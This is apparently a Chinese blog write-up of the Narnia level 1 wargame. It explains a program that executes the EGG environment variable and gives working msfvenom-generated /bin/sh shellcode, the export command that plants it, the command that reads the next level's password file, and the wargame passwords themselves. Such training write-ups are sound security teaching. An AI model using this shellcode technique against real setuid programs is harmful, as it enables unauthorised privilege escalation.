二进制学习之narnia1

本文介绍通过构造特殊环境变量EGG,利用Narnia1的漏洞获取更高权限bash的方法。通过使用msfvenom生成shellcode并设置EGG环境变量,最终成功执行并读取narnia2的密码。

密码:narnia1:efeidiedae

分析

查看narnia1.c

#include <stdio.h>
int main(){
    int (*ret)();

    if(getenv("EGG")==NULL){
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }

    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();

    return 0;
}
n

这里判断egg环境变量是否存在,若不存在,报错后退出,若存在,执行该变量内容,因此可以通过构造egg变量获取高权限bash
在这里插入图片描述

构造

msfvenom构造shellcode

msfvenom -p linux/x86/exec CMD=/bin/sh  -b "\x00" -f c

得到shellcode

"\xbe\xef\x99\xa1\xd7\xdb\xde\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x0b\x83\xc7\x04\x31\x77\x11\x03\x77\x11\xe2\x1a\xf3\xaa\x8f\x7d\x56\xcb\x47\x50\x34\x9a\x7f\xc2\x95\xef\x17\x12\x82\x20\x8a\x7b\x3c\xb6\xa9\x29\x28\xc0\x2d\xcd\xa8\xfe\x4f\xa4\xc6\x2f\xe3\x5e\x17\x67\x50\x17\xf6\x4a\xd6"

在这里插入图片描述
设置EGG环境变量

export EGG=$(python -c 'print "\xbe\xef\x99\xa1\xd7\xdb\xde\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x0b\x83\xc7\x04\x31\x77\x11\x03\x77\x11\xe2\x1a\xf3\xaa\x8f\x7d\x56\xcb\x47\x50\x34\x9a\x7f\xc2\x95\xef\x17\x12\x82\x20\x8a\x7b\x3c\xb6\xa9\x29\x28\xc0\x2d\xcd\xa8\xfe\x4f\xa4\xc6\x2f\xe3\x5e\x17\x67\x50\x17\xf6\x4a\xd6"')

获取权限

./narnia1
cat /etc/narnia_pass/narnia2
获取密码 narnia2:nairiepecu

在这里插入图片描述

【无人机】基于改进粒子群算法的无人机路径规划研究[和遗传算法、粒子群算法进行比较](Matlab代码实现)内容概要:本文围绕基于改进粒子群算法的无人机路径规划展开研究,重点探讨了在复杂环境中利用改进粒子群算法(PSO)实现无人机三维路径规划的方法,并将其与遗传算法(GA)、标准粒子群算法等传统优化算法进行对比分析。研究内容涵盖路径规划的多目标优化、避障策略、航路点约束以及算法收敛性和寻优能力的评估,所有实验均通过Matlab代码实现,提供了完整的仿真验证流程。文章还提到了多种智能优化算法在无人机路径规划中的应用比较,突出了改进PSO在收敛速度和全局寻优方面的优势。; 适合人群:具备一定Matlab编程基础和优化算法知识的研究生、科研人员及从事无人机路径规划、智能优化算法研究的相关技术人员。; 使用场景及目标:①用于无人机在复杂地形或动态环境下的三维路径规划仿真研究;②比较不同智能优化算法(如PSO、GA、蚁群算法、RRT等)在路径规划中的性能差异;③为多目标优化问题提供算法选型和改进思路。; 阅读建议:建议读者结合文中提供的Matlab代码进行实践操作,重点关注算法的参数设置、适应度函数设计及路径约束处理方式,同时可参考文中提到的多种算法对比思路,拓展到其他智能优化算法的研究与改进中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值